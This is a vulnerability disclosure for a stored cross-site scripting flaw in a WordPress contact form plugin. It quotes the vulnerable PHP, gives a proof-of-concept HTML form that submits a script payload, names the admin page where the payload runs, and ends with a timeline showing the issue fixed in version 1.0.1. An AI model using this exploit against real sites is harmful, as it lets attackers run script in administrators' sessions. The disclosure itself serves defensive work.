Datas are not escaped correctly.
File: contact-form-to-email\cp-main-class.inc.php (I skip unnecessary lines)
$buffer = "";
foreach ($_POST as $item => $value)
if (isset($fields[str_replace($sequence,'',$item)]))
{
$buffer .= $fields[str_replace($sequence,'',$item)] . ": ". (is_array($value)?(implode(", ",$value)):($value)) . "\n\n";
$params[str_replace($sequence,'',$item)] = $value;
}
$buffer_A = $buffer;
$rows_affected = $wpdb->insert( $wpdb->prefix.$this->table_messages, array( 'formid' => $this->item,
'time' => current_time('mysql'),
'ipaddr' => $_SERVER['REMOTE_ADDR'],
'notifyto' => $_POST[$to.$sequence],
'posted_data' => serialize($params),
'data' =>$buffer_A
) );XSS is visible for admin.
File: cp-admin-int-message-list.inc.php
$data = $events[$i]->data;
$posted_data = unserialize($events[$i]->posted_data);
foreach ($posted_data as $item => $value)
if (strpos($item,"_url") && $value != '')
{
$data = str_replace ($posted_data[str_replace("_url","",$item)],'<a href="'.$value.'" target="_blank">'.$posted_data[str_replace("_url","",$item)].'</a><br />',$data);
}
echo str_replace("\n","<br />",$data); Proof of Concept
We assume that admin uses default form with "subject" field and doesn't use captcha.
If not, use form directly on website and put XSS in any field.
<form method="POST" action="http://wordpress-instalation/">
<input type="hidden" name="cp_pform_psequence" value="_1">
<input type="hidden" name="cp_contactformtoemail_pform_process" value="1">
Form Id: <input type="text" name="cp_contactformtoemail_id" value="1"><br />
XSS:<input type="text" name="subject_1" value="<script>alert("XSS");</script>">
<input type="submit" value="Hack!">
</form>XSS will be visible for admin:
http://wordpress-instalation/wp-admin/options-general.php?page=cp_contactformtoemail&list=1&cal=%form_id%Timeline
- 19-10-2014: Discovered
- 08-11-2014: Vendor notified
- 08-11-2014: Version 1.0.1 released, issue resolved